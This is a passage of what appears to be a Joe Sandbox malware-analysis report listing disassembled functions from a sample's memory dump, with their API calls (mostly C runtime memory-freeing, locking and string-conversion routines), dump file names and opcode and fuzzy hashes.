                                                                                                                                                                                                                                                    Function 006C2983 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                                                                                                    • String ID: P=n
                                                                                                                                                                                                                                                    • API String ID: 2509303402-1394602819
                                                                                                                                                                                                                                                    • Opcode ID: 0881520d113624fef604ac9f6d4497eb8a41e592a53497f510c2acaf02fd342a
                                                                                                                                                                                                                                                    • Instruction ID: da17bc15e94c496544d17ff8df7cddb58d1292ff28f2150693727bd67fb1a96c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0881520d113624fef604ac9f6d4497eb8a41e592a53497f510c2acaf02fd342a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60D17D71A002069FDB21DFA8C891FFEBBB6FF18300F14456DE895A7342DA71A945CB54
                                                                                                                                                                                                                                                    Function 006CFFAF Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3409252457-0
                                                                                                                                                                                                                                                    • Opcode ID: 622060af809cf179b80904ca18e204237541abf575250bb5d087fa3bb5725151
                                                                                                                                                                                                                                                    • Instruction ID: 5c8554235a7011a8014dcc95d5220f608c1b40bbf3c6a796a8a54797e2b4aa0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 622060af809cf179b80904ca18e204237541abf575250bb5d087fa3bb5725151
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83D1C171E00305AFFB20AFA49C41FBE77AAEF45310F15416FE911AB381EA719901CBA5
                                                                                                                                                                                                                                                    Function 006D0A25 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 373COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: @bo$@bo
                                                                                                                                                                                                                                                    • API String ID: 269201875-1379214479
                                                                                                                                                                                                                                                    • Opcode ID: e45fbc210dad4e5ec59ab6ef445cdf675798d8bde87fe2dfb8066f265e538654
                                                                                                                                                                                                                                                    • Instruction ID: 8f0d912aed1f1a9c580127747aaff959c8cd303950c0e6bb0f2b335d09b48294
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e45fbc210dad4e5ec59ab6ef445cdf675798d8bde87fe2dfb8066f265e538654
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65C10376E40204AFEB60DBA8CC42FEE77F9EF48710F14415AFA05FB282D571A9419794
                                                                                                                                                                                                                                                    Function 006D162D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 006D1671
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D0944
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D0956
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D0968
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D097A
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D098C
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D099E
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D09B0
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D09C2
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D09D4
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D09E6
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D09F8
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D0A0A
                                                                                                                                                                                                                                                      • Part of subcall function 006D0927: _free.LIBCMT ref: 006D0A1C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D1666
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: HeapFree.KERNEL32(00000000,00000000,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?), ref: 006C80EC
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: GetLastError.KERNEL32(?,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?,?), ref: 006C80FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D1688
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D169D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D16A8
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D16CA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D16DD
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D16EB
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D16F6
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D172E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D1735
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D1752
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D176A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID: @bo
                                                                                                                                                                                                                                                    • API String ID: 161543041-85795134
                                                                                                                                                                                                                                                    • Opcode ID: 795fd0b80af1b9d25dac91b18707a3c86984e4ae8b76fa1c92146124839ef88f
                                                                                                                                                                                                                                                    • Instruction ID: 8c2c4eec6f55f27f75c05175aa837205f9890191bcd71448e4859135728b3c5d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 795fd0b80af1b9d25dac91b18707a3c86984e4ae8b76fa1c92146124839ef88f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25313A31A00341AFEB70AA38D845BAA77EBFF01350F14441FE065AB361DEB0EC848A54
                                                                                                                                                                                                                                                    Function 006B991A Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(006F8FA8,00000FA0,?,?,006B98F8), ref: 006B9926
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,006B98F8), ref: 006B9931
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,006B98F8), ref: 006B9942
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006B9954
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006B9962
                                                                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,006B98F8), ref: 006B9985
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(006F8FA8,00000007,?,?,006B98F8), ref: 006B99A1
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,006B98F8), ref: 006B99B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006B992C
                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 006B995A
                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 006B994E
                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 006B993D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                    • Opcode ID: fcc8b3c4770337fc3272e70a73f30aa652c793f8d05e114fdcbcd570937e81a7
                                                                                                                                                                                                                                                    • Instruction ID: b7cc1660e8f5b3d0a0ab4cd3a52343bf5c5162047d9d52bc44ddab8fb6b274c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc8b3c4770337fc3272e70a73f30aa652c793f8d05e114fdcbcd570937e81a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5301F5B17423929FC7202BB56C0CAAA3A5BBB42B907091018FA01DF2A0DF7489808730
                                                                                                                                                                                                                                                    Function 006CB44D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 0-3907804496
                                                                                                                                                                                                                                                    • Opcode ID: 26a36b2f7d410c0e9eac94bdeb75745effdb5f7f0c5b16d85ee5728312d013a3
                                                                                                                                                                                                                                                    • Instruction ID: 51843d052ab9066a8f9a96c797725dd790be70f3a88120f6c337e257e5ce282a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26a36b2f7d410c0e9eac94bdeb75745effdb5f7f0c5b16d85ee5728312d013a3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BC1AC70A042499BDF15DFA8C892FBD7BB2EF8A300F14505DE945AB392C7349941CB75
                                                                                                                                                                                                                                                    Function 006D0E44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: @bo
                                                                                                                                                                                                                                                    • API String ID: 269201875-85795134
                                                                                                                                                                                                                                                    • Opcode ID: b4eba84476b3564e347b3b52e439f70f7c8eb828393d4be3bdc263433b423bda
                                                                                                                                                                                                                                                    • Instruction ID: c31f5dc461d6c6cf85c55e42046931cf2e2e4728f94f29073abe76e5d4d46f30
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4eba84476b3564e347b3b52e439f70f7c8eb828393d4be3bdc263433b423bda
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29618171E00305AFEB70DF64C841BAAB7EAEB44710F20455EF955EB381EB709D418B50
                                                                                                                                                                                                                                                    Function 006B8CA3 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 139threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                                                                                                                                                                                                    • String ID: /i
                                                                                                                                                                                                                                                    • API String ID: 3943753294-3259200781
                                                                                                                                                                                                                                                    • Opcode ID: 545a822d26fe804533a64177ec61e5671359c17ededdd61a0219b3b290ffd4cd
                                                                                                                                                                                                                                                    • Instruction ID: 2703e421565eb3ac835e357c561d85571137cc74afca4c378ec373849990e16e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 545a822d26fe804533a64177ec61e5671359c17ededdd61a0219b3b290ffd4cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2518DB1900216CFCF20DF64D9C55E9BBBAEF19310B24845AE906EF291CB30ED81DB64
                                                                                                                                                                                                                                                    Function 006BCC42 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 006BCD3F
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 006BCD61
                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 006BCE70
                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 006BCF42
                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 006BCFC6
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 006BCFE1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2123188842-393685449
                                                                                                                                                                                                                                                    • Opcode ID: 9e2ef80109d8e75095d343707fa8777861f5d3b5d12916ec42048bc721bc369f
                                                                                                                                                                                                                                                    • Instruction ID: 138888fde51dae9871d185abb6c64e20d5957115ea511cd853bc6618e345c891
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2ef80109d8e75095d343707fa8777861f5d3b5d12916ec42048bc721bc369f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1B14BB5800209EFCF15DFA4C9819EEBBBBFF04320B1445AAE8156B252D731DB91CB95
                                                                                                                                                                                                                                                    Function 006C6BD8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6BEE
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: HeapFree.KERNEL32(00000000,00000000,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?), ref: 006C80EC
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: GetLastError.KERNEL32(?,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?,?), ref: 006C80FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6BFA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C05
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C10
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C1B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C26
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C31
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C3C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C47
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6C55
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: c68159ebcd80737f1a948e4c9da8201ad74733a71220940e36d6b806b91ebc65
                                                                                                                                                                                                                                                    • Instruction ID: 7dc17c2a713db87c993339629d0206e0ad7fdd5bbbe37a1ce6ea357cdcd0e0c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c68159ebcd80737f1a948e4c9da8201ad74733a71220940e36d6b806b91ebc65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36217B7690010CAFCB51EF94C981EEE7BBAFF18350F0141AAF515AB121EB71DA58CB84
                                                                                                                                                                                                                                                    Function 006B2690 Relevance: 12.3, APIs: 8, Instructions: 343COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3990724213-0
                                                                                                                                                                                                                                                    • Opcode ID: e7f8b694c4ce682d593e4c6daa739f226449fcc851926fc60182dc6354998753
                                                                                                                                                                                                                                                    • Instruction ID: 1dd9674994501725ebbd3b0f83146d539297452bc3e34eb67165f42850818ac2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7f8b694c4ce682d593e4c6daa739f226449fcc851926fc60182dc6354998753
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AB114F1D00206AFDB21EF64C855BEABBFABF05310F00452EE81657752DB34A985CB91
                                                                                                                                                                                                                                                    Function 006B96F6 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 006B973F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 006B976B
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 006B97AA
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006B97C7
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 006B9806
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 006B9823
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006B9865
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006B9888
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: a0563b9878ec20761c3ab997bdba08a844f0e2f7bdd37e8635d6b67d99adc4c3
                                                                                                                                                                                                                                                    • Instruction ID: 0b41518825a0d18ce67a65b334ce4b0d876d6bf084976aaa5f19689a7496521f
